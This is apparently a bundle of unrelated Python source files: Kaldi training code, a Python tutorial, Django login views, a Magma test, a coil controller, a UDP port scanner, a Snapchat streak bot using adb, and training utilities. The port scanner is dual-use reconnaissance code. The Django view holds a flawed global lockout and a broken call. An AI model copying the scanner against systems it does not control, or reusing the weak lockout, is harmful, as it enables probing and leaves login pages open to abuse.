mfcc_file_path = kaldi_structure.conf.joinpath('mfcc.conf')
decode_config_file_path = kaldi_structure.conf.joinpath('decode.config')
template_path = Path('/elpis/elpis/engines/kaldi/templates')
path_resource = template_path.joinpath('path.sh')
mfcc_resource = template_path.joinpath('mfcc.conf')
decode_config_resource = template_path.joinpath('decode.config')
# task make-nonsil-phones > {{ .KALDI_OUTPUT_PATH }}/tmp/nonsilence_phones.txt
nonsilence_phones_path = kaldi_data_local_dict.joinpath('nonsilence_phones.txt')
# build a unnique non-sorted list of the phone symbols
# can't use sorting, because the rules may have order significance
# ignore comment lines that begin with #
seen = OrderedDict()
for line in open(self.pron_dict.l2s_path, "r"):
if line[0] == "#":
pass
else:
line = line.split()[1:]
if len(line) > 0:
line = line[0]
seen[line] = seen.get(line, 0) + 1
with nonsilence_phones_path.open(mode='w') as fout:
for (item, i) in seen.items():
fout.write("%s\n" % item)
with path_file_path.open(mode='w') as fout:
with path_resource.open() as fin:
content = Template(fin.read()).render(
{
'KALDI_ROOT': '/kaldi',
'HELPERS_PATH': '/kaldi-helpers',
'CORPUS_PATH': f'..{self.dataset.pathto.original}'
}
)
fout.write(content)
with mfcc_file_path.open(mode='w') as fout:
with mfcc_resource.open() as fin:
content = Template(fin.read()).render(
{
'MFCC_SAMPLE_FREQUENCY': '44100',
'MFCC_FRAME_LENGTH': '25',
'MFCC_LOW_FREQ': '20',
'MFCC_HIGH_FREQ': '22050',
'MFCC_NUM_CEPS': '7',
}
)
fout.write(content)
with decode_config_file_path.open(mode='w') as fout:
with decode_config_resource.open() as fin:
content = Template(fin.read()).render(
{
'DECODE_BEAM': '11.0',
'DECODE_FIRST_BEAM': '8.0'
}
)
fout.write(content)
try:
# task copy-generated-files
output_path = self.path.joinpath('output')
output_path.mkdir(parents=True, exist_ok=True)
# - cp {{ .KALDI_OUTPUT_PATH }}/tmp/json_splitted/training/corpus.txt {{ .KALDI_OUTPUT_PATH }}/kaldi/data/local/
shutil.move(f"{output_path.joinpath('training', 'corpus.txt')}", f"{kaldi_data_local}")
shutil.move(f"{output_path.joinpath('testing', 'segments')}", f"{kaldi_data_test.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('testing', 'text')}", f"{kaldi_data_test.joinpath('text')}")
shutil.move(f"{output_path.joinpath('testing', 'utt2spk')}", f"{kaldi_data_test.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('testing', 'wav.scp')}", f"{kaldi_data_test.joinpath('wav.scp')}")
shutil.move(f"{output_path.joinpath('training', 'segments')}", f"{kaldi_data_train.joinpath('segments')}")
shutil.move(f"{output_path.joinpath('training', 'text')}", f"{kaldi_data_train.joinpath('text')}")
shutil.move(f"{output_path.joinpath('training', 'utt2spk')}", f"{kaldi_data_train.joinpath('utt2spk')}")
shutil.move(f"{output_path.joinpath('training', 'wav.scp')}", f"{kaldi_data_train.joinpath('wav.scp')}")
# task copy-phones-configs
optional_silence_file_path = kaldi_data_local_dict.joinpath('optional_silence.txt')
silence_phones_file_path = kaldi_data_local_dict.joinpath('silence_phones.txt')
with optional_silence_file_path.open(mode='w') as fout:
fout.write('SIL\n')
with silence_phones_file_path.open(mode='w') as fout:
fout.write('SIL\nsil\nspn\n')
shutil.copy(f"{template_path.joinpath('cmd.sh')}", f"{local_kaldi_path}")
shutil.copytree(f"{template_path.joinpath('stages')}", local_kaldi_path.joinpath('stages'))
for file in os.listdir(local_kaldi_path.joinpath('stages')):
os.chmod(local_kaldi_path.joinpath('stages').joinpath(file), 0o774)
shutil.copy(f"{template_path.joinpath('score.sh')}", f"{kaldi_local}")
run(f"cp -L -r /kaldi/egs/wsj/s5/steps {local_kaldi_path}/steps")
run(f"cp -L -r /kaldi/egs/wsj/s5/utils {local_kaldi_path}/utils")
# modified extract-wavs
for audio_file in os.listdir(self.dataset.pathto.resampled):
src = f'{self.dataset.pathto.resampled.joinpath(audio_file)}'
dst = f'{local_kaldi_path}'
shutil.copy(src, dst)
print('kaldi dirs preparation done.')
except OSError as error:
print('couldnt prepare kaldi dirs: ', error)
def train():
local_kaldi_path = self.path.joinpath('kaldi')
# Prepare (dump, recreate) main train log file
run_log_path = self.path.joinpath('train.log')
if os.path.isfile(run_log_path):
os.remove(run_log_path)
run(f"touch {run_log_path};")
# Organise stage logs in a dir
train_log_dir = self.path.joinpath('train-logs')
if os.path.exists(train_log_dir):
shutil.rmtree(train_log_dir)
os.mkdir(train_log_dir )
stage_count = 0
stages = os.listdir(local_kaldi_path.joinpath('stages'))
for stage in sorted(stages):
print(f"Stage {stage} starting")
self.stage_status = (stage, 'in-progress', '', 'starting')
# Create log file
stage_log_path = self.path.joinpath(os.path.join(train_log_dir, f'stage_{stage_count}.log'))
with open(stage_log_path, 'w+'):
pass
# Manipulate stage templates with user-defined settings
# TODO replace with jinja templates or something similar
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'r') as file :
filedata = file.read()
# Add settings to replace here
filedata = filedata.replace('lm_order=1', f'lm_order={self.ngram}')
with open(local_kaldi_path.joinpath('stages').joinpath(stage), 'w') as file:
file.write(filedata)
# Run the command, log output. Also redirect Kaldi sterr output to log. These are often not errors :-(
try:
stage_process = run(f"cd {local_kaldi_path}; stages/{stage} >> {stage_log_path}")
with open(stage_log_path, 'a+') as file:
print('stdout', stage_process.stdout, file=file)
print('stderr', stage_process.stderr, file=file)
print('done', file=file)
print(f"Stage {stage} complete")
stage_log = stage_process.stdout + "\n" + stage_process.stderr
print(f"Stage {stage} log", stage_log)
self.stage_status = (stage, 'complete', '', stage_log)
# add to stage_log
stage_count = stage_count + 1
except CalledProcessError as error:
with open(stage_log_path, 'a+') as file:
print('stderr', error.stderr, file=file)
print('failed', file=file)
print(f"Stage {stage} failed")
self.stage_status = (stage, 'failed', '', 'LOG-C')
break
self.log = ''
# Concat all the files in the train-log dir
log_filenames = os.listdir(train_log_dir)
log_filenames.sort()
with open(run_log_path, 'w') as outfile:
for log_file in log_filenames:
with open(os.path.join(train_log_dir, log_file)) as infile:
log_contents = infile.read()
outfile.write(log_contents)
outfile.write("\n")
self.log += log_contents
def run_training_in_background():
def background_train_task():
prepare_for_training()
train()
self.status = 'trained'
on_complete()
self.status = 'training'
t = threading.Thread(target=background_train_task)
t.start()
if on_complete is None:
self.status = 'training'
prepare_for_training()
train()
self.status = 'trained'
else:
run_training_in_background()
return
def get_train_results(self):
log_file = self.path.joinpath('train.log')
results = {}
with log_file.open() as fin:
wer_lines = []
for line in reversed(list(fin)):
line = line.rstrip()
if "%WER" in line:
# use line to sort by best val
line_r = line.replace('%WER ', '')
wer_lines.append(line_r)
wer_lines.sort(reverse = True)
line = wer_lines[0]
line_split = line.split(None, 1)
wer = line_split[0]
line_results = line_split[1]
line_results = re.sub("[\[\]]", "", line_results)
results_split = line_results.split(',')
count_val = results_split[0].strip()
ins_val = results_split[1].replace(' ins', '').strip()
del_val = results_split[2].replace(' del', '').strip()
sub_val = results_split[3].replace(' sub', '').strip()
results = {'wer': wer, 'count_val': count_val, 'ins_val': ins_val, 'del_val': del_val,
'sub_val': sub_val}
print(results)
return results
|
0-5. pythonbasic-2.py
|
# python basic -2
# adding
a = 1
b = 2
c = a+b
print(c)
# if-else sentences
if a > 0:
print("a>0")
else:
print("a<0")
# import library
import math
n = math.sqrt(16.0)
print(n)
# data type
print(int(3.5),2e3,float("1.6"),float("inf"),float("-inf"),bool(0),bool(-1),bool("False"))
# imaginary number
v = 2 + 3j
print(v.real,v.imag)
a = [1,2,3,4]
b = 3 in a
print(b)#True
# String
a = "ABC"
b = a
print(a is b)#True
# Print
print("name: %s ages: %d" % ("John",16))
print("number = %0.4f, number2 = %10.5f" % (3.141592,3.141592))
# String
s = "Hello"
print(type(s),s[1])
s = '.'.join(['AB','CD','DF'])
print(s)
s = ' '.join(['AB','CD','EF'])
print(s)
items = 'AB,CD,EF'.split(',')
print(items)
s = "Name:{0}, Age:{1}".format("John",10)
print(s)
s = "Name:{name},Age:{age}".format(name="John",age=10)
print(s)
area = (10,20)
s = "width: {x[0]}, height {x[1]}".format(x = area)
print(s)
# list and for loop
list1 = ["AB","CD","EF"]
for s in list1:
print(s)
sum = 0
for i in range(101):#0~100
sum += i
print(sum)
a = []
a = ["AB",10,False]
x = a[1]
a[1] = "Good"
y = a[-1]
print(x,a[1],y)
# Merge
a = [1,2]
b = [3,4,5]
c = a+b
print(c)
d = a*3
print(d)
# list search
list1 = "the john is the good man".split()
a = list1.index('john')# 1
n = list1.count('the')# 2
print(a,n)
# list comprehension
list1 = [n ** 3 for n in range(10) if n % 2 == 0]
print(list1)
# Tuple
name = ("Kim","Park")
print(name)
firstname,lastname=name
print(lastname,',',firstname)
# Dictionary
scores = {"kim":100,"Park":90}
v = scores["kim"]
scores["Park"]= 95
print(scores)
scores["Lee"]=100
del scores["kim"]
print(scores)
for a in scores:
val = scores[a]
print("%s : %d" % (a,val))
keys = scores.keys()
for k in keys:
print(k)
values = scores.values()
for v in values:
print(v)
scores.update({"Park":100,"Lee":80})
print(scores)
# Set
our_set = {'True','False','True','True'}
s = set(our_set)
print(s)
num_set = {1,2,3,4,5}
num_set.add(10)
print(num_set)
num_set.update({15,20,25})
print(num_set)
num_set.remove(1)
print(num_set)
num_set.clear()
print(num_set)
a = {1,2,3}
b = {3,4,5}
i = a & b
print(i)
u = a | b
print(u)
d = a-b
print(d)
# Class
class rectangle:
count = 0
def __init__(self,width,height):
self.width = width
self.height = height
rectangle.count +=1
def calculation(self):
area = self.width*self.height
return area
def square_s(width,height):
return width == height
square = rectangle.square_s(5,5)
square_1 = rectangle(5,5)
print(square,square_1.calculation())
# Thread
import threading
def sum(low,high):
total = 0
for i in range(low,high):
total += 1
print("Subthread, ",total)
t = threading.Thread(target=sum,args=(1,10000))
t.start()
print("Main Thread ")
|
views.py
|
from django.conf import settings
from django.contrib.auth import logout as logout_func
from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect
from django.contrib import messages, auth
from django.contrib.auth.models import User
from django.urls import reverse
from accounts.models import AuthToggle,PassPhrase
import time
import threading
def register(request):
if request.method == "POST":
# Get form values
# first_name = request.POST['first_name']
# last_name = request.POST['last_name']
username = request.POST['username']
email = request.POST['email']
password = request.POST['password']
password2 = request.POST['password2']
# Check if passwords match
if password == password2:
if User.objects.filter(username=username).exists():
messages.error(request, 'That username is taken.')
return redirect('register')
else:
if User.objects.filter(email=email).exists():
messages.error(
request, 'That email is already being used.')
return redirect('register')
else:
# approved
user = User.objects.create_user(
username=username,
password=password,
email=email,
# first_name=first_name,
# last_name=last_name
)
# Login after register
''' auth.login(request, user)
messages.success(request, "You are now logged in")
return redirect('index')'''
user.save()
user.success(
request, "You are now registered and can now log in")
return redirect('login')
else:
messages.error(request, 'Passwords do not match')
return redirect('register')
else:
return render(request, 'accounts/register.html')
'''
def login(request):
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = auth.authenticate(username=username, password=password)
if user is not None:
auth.login(request, user)
messages.success(request, 'You are now logged in!')
return redirect('dashboard')
else:
messages.error(request, 'Invalid credentials')
return redirect('login')
else:
return render(request, 'accounts/login.html')
'''
'''def dashboard(request):
return render(request, 'landings/portal.html')'''
global attempts, maxAttempts, enableTimer
attempts = 0
maxAttempts = 10
enableTimer = False
def index(request):
create_user_if_not_exists()
if request.method == "POST":
passphrase = request.POST.get('passphrase')
gateway = False
protection = AuthToggle.objects.first().enable_protection
global attempts, maxAttempts, enableTimer
if passphrase:
# check for all passphrase values in the database
for x in PassPhrase.objects.all().values():
if passphrase == x['passphrase'] and protection and not enableTimer:
gateway = True
break
if gateway:
return redirect('portal')
else:
attempts += 1
def start_timeout():
global attempts, enableTimer
messages.error(request, 'Timeout Reached: you had attempted ' + str(attempts) + " attempts please wait 1 hour to continue")
# Time in seconds
time.sleep(3600) # 3600 seconds = 1 hr, 60 seconds = 1 min
attempts = 0
enableTimer = False
t1 = threading.Thread(target=start_timeout)
if attempts >= maxAttempts and not enableTimer:
t1.start()
enableTimer = True
elif enableTimer:
messages.error(request, 'Timeout Reached: please wait 1 hour to continue')
else:
messages.error(request, 'Invalid credentials. Attempts left: ' + str(maxAttempts - attempts))
return render(request, 'landings/gateway.html')
else:
return render(request, 'landings/gateway.html')
def portal(request):
context = {
"protection": AuthToggle.objects.first()
}
return render(request, 'landings/portal.html', context)
def logout(request):
global attempts
attempts = 0
return redirect('index')
def pending(request):
return render(request, 'accounts/pending.html')
def reset(request):
# used when a user forgets his or her password and chooses a new one
return render(request, 'accounts/reset.html')
|
metrics_export_test.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
import unittest
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import parse
from integ_tests.cloud.cloud_manager import CloudManager
from integ_tests.cloud.fixtures import GATEWAY_ID, NETWORK_ID
from integ_tests.gateway.rpc import get_gateway_hw_id
class TestHTTPServerRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
print("Received metric export POST request")
# Get post body
request_headers = self.headers
length = int(request_headers.get_all('content-length')[0])
post_body = self.rfile.read(length)
post_body_dict = parse.parse_qs(parse.unquote(post_body.decode('utf-8')))
# Sanity check request, make sure it has the key 'datapoints'
assert(len(post_body_dict['datapoints'][0]) > 0)
print("Metrics export valid")
# Send success response to cloud
self.send_response(200)
self.send_header('content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes('"success"', 'utf-8'))
return
class TestMetricsExport(unittest.TestCase):
"""
Runs a test case which starts a mock metrics server (in this case, ODS)
on a set IP and port and waits for gateway metrics to export via the cloud.
"""
TEST_VM_IP = '192.168.60.141'
TEST_VM_PORT = 8081
METRIC_TIMEOUT = 120 # 2 minutes
def setUp(self):
self._cloud_manager = CloudManager()
self._cloud_manager.delete_networks([NETWORK_ID])
self._cloud_manager.create_network(NETWORK_ID)
self._cloud_manager.register_gateway(
NETWORK_ID, GATEWAY_ID,
get_gateway_hw_id(),
)
self._test_server = HTTPServer(
(self.TEST_VM_IP, self.TEST_VM_PORT),
TestHTTPServerRequestHandler,
)
self._server_thread = threading.Thread(target=self.run_server)
self._server_thread.daemon = True
def tearDown(self):
self._test_server.socket.close()
self._cloud_manager.clean_up()
def handle_timeout(self):
self.assertTrue(
False,
"Metrics not received before timeout, test failed",
)
def run_server(self):
self._test_server.timeout = self.METRIC_TIMEOUT
self._test_server.handle_timeout = self.handle_timeout
self._test_server.handle_request()
def test_metrics_export(self):
print("Starting test server, waiting for metrics export...")
self._server_thread.start()
self._server_thread.join()
print("Metrics exported successfully")
if __name__ == "__main__":
unittest.main()
|
xyzFieldControl.py
|
import threading
import time
import sys
import math
import uncertainties as u
from labjack import ljm # import labjack library
# now import the modules that are part of the repo
import powercontrol.coil as coil
def openPorts():
"""Open all the ports including the labjack and the powersupplies"""
# open the powersupply serial ports
xCoil.supply.openPort()
yCoil.supply.openPort()
#zCoil.supply.openPort()
print('opened all three powersupplies')
# open the labjack serial port
handle = ljm.open(ljm.constants.dtANY, ljm.constants.ctANY, "ANY")
# print the labjack info
info = ljm.getHandleInfo(handle)
print("Opened a LabJack with Device type: %i, Connection type: %i,\n"
"Serial number: %i, IP address: %s, Port: %i,\nMax bytes per MB: %i" %
(info[0], info[1], info[2], ljm.numberToIP(info[3]), info[4], info[5]))
return handle # return the handle so e can close it later
def closePorts(handle):
"""close all the ports including the labjack and the powersupplies"""
# pass in the labjack handle so we don't have to open it on import
xCoil.supply.closePort()
yCoil.supply.closePort()
#zCoil.supply.closePort()
print('closed all three powersupplies')
ljm.close(handle)
print('closed labjack')
return
# define field setting functions
# old non-threading field function.
'''
def fine_field_cart(xField, yField, zField, handle):
"""
Set powersupplies to the proper current for each coil
and set the DACs to the correct voltage with the labjack.
"""
xCoil.setField(xField)
yCoil.setField(yField)
zCoil.setLargeCoilField(zField)
# now adust the adustment coils with the labjack
# Setup and call eWriteNames to write values to the LabJack.
numFrames = 2
names = [xCoil.dacName, yCoil.dacName]
analogValues = [xCoil.dacVoltage, yCoil.dacVoltage] # [2.5 V, 12345]
ljm.eWriteNames(handle, numFrames, names, analogValues)
return
'''
def fine_field_cart(xField, yField, zField, handle):
"""
Set powersupplies to the proper current for each coil
and set the DACs to the correct voltage with the labjack.
"""
t0 = time.time()
# create the thread objects to handle the serial wait times
xThread = threading.Thread(target=xCoil.setField, args=[xField])
yThread = threading.Thread(target=yCoil.setField, args=[yField])
zThread = threading.Thread(target=zCoil.setLargeCoilField, args=[zField])
# start the threads()
xThread.start()
yThread.start()
zThread.start()
# now adust the adustment coils with the labjack
# Setup and call eWriteNames to write values to the LabJack.
numFrames = 2
names = [xCoil.dacName, yCoil.dacName]
analogValues = [xCoil.dacVoltage, yCoil.dacVoltage] # [2.5 V, 12345]
ljm.eWriteNames(handle, numFrames, names, analogValues)
# wait for the threads to finish before moving on
# (prevent thread duplication in an additional call)
xThread.join()
yThread.join()
zThread.join()
t1 = time.time()
#print('total time between = %s' % (t1-t0))
#print('total time between = {0}'.format(t1-t0)) #
def field_cart(xField, yField, zField):
"""
Corsely set the coils using the large powersupplies only.
(avoid using the adustment coils)
"""
xCoil.setLargeCoilField(xField)
yCoil.setLargeCoilField(yField)
zCoil.setLargeCoilField(zField)
return
# rotate the coridinate system to allow us to input field values perpendicular
# to the optical zero.
def fine_field_cart_rotation(xField, yField, zField, phi, handle):
"""
Rotate a the cordinate system about the z axis
so we can allign our control components to be perpendicular
and parallel to the optical zero.
"""
# do a rotation about the z axis.
xFieldPrime = xField * math.cos(phi) + yField * math.sin(phi)
yFieldPrime = yField * math.cos(phi) - xField * math.sin(phi)
fine_field_cart(xFieldPrime, yFieldPrime, zField, handle)
return
'''def pid_duration(kP, kI, kD, durationInSeconds, labjackHandle):
startTime = time.time() # time stamp to start the clock
# load in the field values for the coils
xField = self.'''
def main():
# calibration predifines
xFieldGain = u.ufloat(42.24e-6, 0.08e-6) # T/A
yFieldGain = u.ufloat(45.99e-6, 0.09e-6) # T/A
zFieldGain = u.ufloat(132.16e-6, 0.08e-6) # T/A
# field to current gain for the adustment coils which is
# extrapolated from the large coil calibration.
xAFieldGain = xFieldGain / 25 # T/A
yAFieldgain = yFieldGain / 20 # T/A
# insanteate the coil objects.
xCoil = coil.Coil('/dev/tty.usbserial-FTBZ1G1B', xFieldGain)
yCoil = coil.Coil('/dev/tty.usbserial-FTBYZZIN', yFieldGain)
zCoil = coil.Coil('/dev/tty.usbserial-FTFBPHDT', zFieldGain)
if __name__ == '__main__':
main()
|
udpScanner.py
|
#!/usr/bin/env python
# coding: utf-8
# In[23]:
import socket
import time
import struct
import threading
import argparse
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
formats = logging.Formatter('%(asctime)s[%(message)]', '%m/%d/%Y %I:%M:%S:%p')
console = logging.StreamHandler()
console.setFormatter(formats)
logger.addHandler(console)
parser = argparse.ArgumentParser()
parser.add_argument('--IP', type=str, default='127.0.0.1',
help='IP you want to scan, default:127.0.0.1')
parser.add_argument('--w', type=str, default='all',
help='select the way you want to scan:\nall: scan all the ports.\none: scan just one port gave.,default:all')
parser.add_argument('--p', type=int, default=2333,
help='the port you want to scan(less than 65536),default:2333')
args = parser.parse_args()
# In[24]:
def udpMessageSender(ip, port):
while True:
try:
sockUdp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sockUdp.sendto("Hello world!", (ip, port))
sockUdp.close()
break
except:
print("Fail to send the udp message, try again")
time.sleep(1)
continue
# In[25]:
def icmpMessageReceiver(ip, port):
try:
sockIcmp = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except:
print("You should run as root user")
return
sockIcmp.settimeout(5)
while True:
try:
packet, addr = sockIcmp.recvfrom(65536)
icmpHead = packet[20:28]
headType, code, checksum, packetID, sequence = struct.unpack(
"bbHHh",icmpHead
)
break
except:
print("the port:%s on %s is opened" %(port, ip))
return
sockIcmp.close()
if code == 3 and headType == 3 and addr[0] == ip:
print("the port:%s on %s is closed" %(port, ip))
elif code in [1, 2, 9, 10, 13] and headType == 3 and addr[0] == ip:
print("the port:%s on %s is filted" %(port, ip))
return
# In[26]:
def udpScanPort(ip, port):
icmpReceiveThread = threading.Thread(target=icmpMessageReceiver, args=(ip, port))
icmpReceiveThread.daemon = True
icmpReceiveThread.start()
time.sleep(0.2)
udpMessageSender(ip, port)
time.sleep(0.2)
icmpReceiveThread.join()
return
# In[27]:
if __name__ == '__main__':
if args.IP and args.w == 'one' and args.p < 65536:
udpScanPort(args.IP, args.p)
elif args.IP and args.w == 'all':
for item in range(130, 141):
udpScanPort(args.IP, item)
# In[ ]:
|
skeleton.py
|
import random
import threading
import time
from datetime import datetime
from ppadb.client import Client as AdbClient
from ppadb.device import Device
from .ocr import find_last_snap
client = AdbClient(host="127.0.0.1", port=5037)
def sleep_after_exec(func):
def wrapper(*args, **kwargs):
func(*args, **kwargs)
time.sleep(0.9)
return wrapper
def get_resolution(device):
return tuple(
[int(x) for x in str(device.shell("wm size")).split(" ")[2].replace("\n", "").split("x")])
def log(string):
print(f'[{datetime.utcnow().strftime("%H:%M:%S.%f")[:-3]}]: {string}')
@sleep_after_exec
def open_snapchat(device):
"""
used: adb shell pm dump PACKAGE_NAME | grep -A 1 MAIN to find the activity for com.snapchat.android
"""
log(f"{device.get_serial_no()}: Opening Snapchat")
device.shell("am start -n com.snapchat.android/.LandingPageActivity")
def go_to_homepage(device):
log(f"{device.get_serial_no()}: Going Back Home")
device.shell("am start -a android.intent.action.MAIN -c android.intent.category.HOME")
@sleep_after_exec
def click_picture(width, height, device):
x = width / 2
y = height - height / 8
log(f"{device.get_serial_no()}: Clicking Camera at {x},{y}")
device.input_tap(x, y)
@sleep_after_exec
def click_video(width, height, device):
x = width / 2
y = height - height / 8
log(f"{device.get_serial_no()}: Clicking Video at {x},{y}")
device.input_swipe(x, y, x, y, 10000)
@sleep_after_exec
def send_picture(width, height, device):
x = width - width / 16
y = height - height / 16
log(f"{device.get_serial_no()}: Clicking Send at {x},{y}")
device.input_tap(x, y)
@sleep_after_exec
def click_random_filter(width, height, device):
if random.randint(1, 2) == 1:
device.input_swipe(width - 100, height / 2, 100, 1700, 150)
else:
device.input_swipe(100, height / 2, width - 100, 1700, 150)
@sleep_after_exec
def click_last_snap(device, last_snap_x, last_snap_y):
log(f"{device.get_serial_no()}: Clicking Last Send at {last_snap_x},{last_snap_y}")
device.input_tap(last_snap_x, last_snap_y)
def capture_screen(device):
result = device.screencap()
with open(f"{device.get_serial_no()}-screen.png", "wb") as fp:
fp.write(result)
#
# def click_all_people(dev_width, dev_height, device, recents_y):
# x = 90
# y = recents_y + 90
# threshold = 45
# log(f"{device.get_serial_no()}: Clicking All Recents from {100},{recents_y}")
# for i in range(60):
# log("Tap")
# device.input_tap(x, y)
# y += 90
def streak_on_device(picture, device: Device):
dev_width, dev_height = get_resolution(device)
open_snapchat(device)
if picture:
click_picture(dev_width, dev_height, device)
click_random_filter(dev_width, dev_height, device)
else:
click_video(dev_width, dev_height, device)
send_picture(dev_width, dev_height, device)
capture_screen(device)
log(f"{device.get_serial_no()}: Finding Last Snap")
(x, y, recents_y) = find_last_snap(device.get_serial_no())
if x == -1:
log(f"{device.get_serial_no()}: Last Snap NOT FOUND")
else:
log(f"{device.get_serial_no()}: Last Snap FOUND")
click_last_snap(device, x, y)
send_picture(dev_width, dev_height, device)
go_to_homepage(device)
def streak_call(picture: bool):
for device in client.devices():
log(f"Working on {device}")
threading.Thread(target=streak_on_device, args=(picture, device)).start()
def main():
log("Press V for Video, C for Picture and Q for Quiting the tool")
while True:
listening_char = input()
if listening_char == "V" or listening_char == "v":
streak_call(picture=False)
elif listening_char == "C" or listening_char == "c":
streak_call(picture=True)
elif listening_char == "Q" or listening_char == "q":
exit()
else:
log("Wrong Entry! Try again")
def run():
"""Entry point for console_scripts
"""
main()
if __name__ == "__main__":
run()
|
training.py
|
from . import data
from . import utils
import logging
import time
import queue
import threading
import copy
class GeneratorEnqueuer(data.BatchGenerator):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
"""
def __init__(self, generator):
# Copy the steps per epoch and batch size if it has one
if hasattr(generator, "steps_per_epoch") and hasattr(generator, "batch_size"):
super(GeneratorEnqueuer, self).__init__(
steps_per_epoch=generator.steps_per_epoch,
batch_size=generator.batch_size,
)
else:
logging.warning(
"Input generator does not have a steps_per_epoch or batch_size "
"attribute. Continuing without them."
)
self._generator = generator
self._threads = []
self._stop_event = None
self.queue = None
self.wait_time = None
def start(self, workers=1, max_q_size=10, wait_time=0.05):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_q_size: queue size (when full, threads could block on put())
wait_time: time to sleep in-between calls to put()
"""
self.wait_time = wait_time
def data_generator_task():
while not self._stop_event.is_set():
try:
if self.queue.qsize() < max_q_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
self._threads.append(threading.Thread(target=data_generator_task))
self._threads[-1].start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
self._threads = []
self._stop_event = None
self.queue = None
def __next__(self):
if not self.is_running():
raise ValueError("Generator must be running before iterating over it")
while True:
if not self.queue.empty():
return self.queue.get()
else:
# print("Waiting...")
time.sleep(self.wait_time)
class TrainingLogs(dict):
def __init__(self, initial_epoch=0):
"""Container for storing relevant training
information. Acts like a dictionary where
each metric name is mapped to the list
of its score for each epoch.
Keyword Arguments:
initial_epoch {int} -- The initial epoch of training (default: {0})
"""
super().__init__()
# Stores accumulated metrics over the current epoch
self.epoch_logs = {}
# Stores metrics for current batch
self.batch_logs = {}
self.epochs = initial_epoch # Completed epochs
self.steps = 0 # Overall completed training step
self.epoch_steps = 0 # Step in current epoch
def on_epoch_begin(self):
"""Resets the metric logs for the epoch"""
self.epoch_logs = {}
self.batch_logs = {}
self.epoch_steps = 0
def log_metric(self, metric, score):
self.batch_logs[metric.__name__] = score.item()
self.epoch_logs[metric.__name__] = metric.accumulate()
def log_metrics(self, metrics, scores, steps=1):
"""Log a metrics and their corresponding scores.
"""
assert len(metrics) == len(scores)
for metric, score in zip(metrics, scores):
self.log_metric(metric, score)
def step(self, steps=1):
"""Update the number of steps that have passed."""
self.steps += steps
self.epoch_steps += steps
def on_epoch_end(self):
for metric_name, score in self.epoch_logs.items():
# Create the metric score list if its not there.
self.setdefault(metric_name, []).append(score)
self.epochs += 1
def log_validation_metric(self, metric):
self.epoch_logs["val_" + metric.__name__] = metric.accumulate()
def log_validation_metrics(self, metrics):
for metric in metrics:
self.log_validation_metric(metric)
class LossManager(object):
@utils.resettable
def __init__(self):
self.__loss_names = []
self.__loss_input_dict = {}
self.__loss_weight_dict = {}
self.__loss_dict = {}
self.__verify_loss_args = True
self.__loss_scores = {}
def __len__(self):
return len(self.__loss_names)
@property
def names(self):
return list(self.__loss_names)
def _compute_single_loss(self, model, targets, name):
# Cache the score for logging
self.__loss_scores[name] = self.__loss_weight_dict[name] * self.__loss_dict[
name
](
*[
getattr(model, loss_input)
for loss_input in self.__loss_input_dict[name]
],
targets,
)
return self.__loss_scores[name]
def verify_args(self, model):
for loss_name, loss_inputs in self.__loss_input_dict.items():
for loss_input in loss_inputs:
if not hasattr(model, loss_input):
raise AttributeError(
"Model does not have attribute {loss_input}, which"
" is an input for the loss {loss_name}".format(
loss_input=loss_input, loss_name=loss_name
)
)
def loss(self, model, targets):
# This means we need to verify that the input arguments for the loss
# exist, and notify the user if they don't
if self.__verify_loss_args:
self.verify_args(model)
self.__verify_loss_args = False
# Compute the loss
return sum(
self._compute_single_loss(model, targets, loss_name)
for loss_name in self.__loss_names
)
def get_loss_score(self, name=None):
if name is None:
assert not len(self.__loss_names), (
"Need to specify a loss if " "using multiple losses."
)
name = self.__loss_names[0]
return self.__loss_scores[name]
def add_loss(self, loss_fn, inputs, weight=1.0, name=None):
if name is None:
name = "loss_{}".format(len(self.__loss_dict))
assert name not in self.__loss_dict, f"You already added loss {name}"
self.__loss_dict[name] = loss_fn
self.__loss_input_dict[name] = inputs
self.__loss_weight_dict[name] = weight
self.__loss_names.append(name)
return name
def add_loss_with_aux(
self, stateful_loss_fn, inputs, auxilaries, weight=1.0, name=None
):
"""Loss function must store auxiliary values in stateful_loss_fn.
It then returns the combined value (however it wants to combine them)
"""
# Add the complete loss function
name = self.add_loss(stateful_loss_fn, inputs, weight=weight, name=name)
# Get the outputs and reference their values from
for aux in auxilaries:
def bind_function(aux):
def func(*args):
val = getattr(stateful_loss_fn, aux)
assert val is not None, f"Value for auxilary loss {aux} is None"
setattr(stateful_loss_fn, aux, None)
return val
func.__name__ = aux
return func
self.add_loss(bind_function(aux), inputs, weight=weight, name=aux)
def remove_loss(self, name=None):
if name is None:
name = self.__loss_names.pop()
else:
self.__loss_names.remove(name)
loss_fn = self.__loss_dict.pop(name)
inputs = self.__loss_input_dict.pop(name)
weight = self.__loss_weight_dict.pop(name)
return {"name": name, "loss": loss_fn, "inputs": inputs, "weight": weight}
def clear_losses(self):
self.reset()
class OptimizerManager(object):
@utils.resettable
